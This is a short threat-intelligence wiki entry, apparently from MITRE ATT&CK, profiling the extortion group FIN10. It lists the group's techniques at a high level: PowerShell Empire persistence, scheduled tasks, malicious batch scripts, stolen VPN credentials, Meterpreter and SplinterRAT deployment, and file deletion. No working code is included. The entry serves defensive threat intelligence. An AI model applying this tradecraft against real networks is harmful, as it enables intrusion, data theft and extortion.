Group: FIN10

From enterprise
Jump to: navigation, search
FIN10
Group
ID G0051
Aliases FIN10

FIN10 is a financially motivated threat group that has targeted organizations in North America since at least 2013 through 2016. The group uses stolen data exfiltrated from victims to extort organizations.1

Techniques Used

  • PowerShell - FIN10 uses PowerShell for execution as well as PowerShell Empire to establish persistence.12
  • Scheduled Task - FIN10 has established persistence by using S4U tasks as well as the Scheduled Task option in PowerShell Empire.12
  • Scripting - FIN10 has executed malicious .bat files containing PowerShell commands.1
  • Valid Accounts - FIN10 has used stolen credentials to connect remotely to victim networks using VPNs protected with only a single factor. The group has also moved laterally using the Local Administrator account.1
  • Remote File Copy - FIN10 has deployed Meterpreter stagers and SplinterRAT instances in the victim network after moving laterally.1
  • File Deletion - FIN10 has used batch scripts and scheduled tasks to delete critical system files.1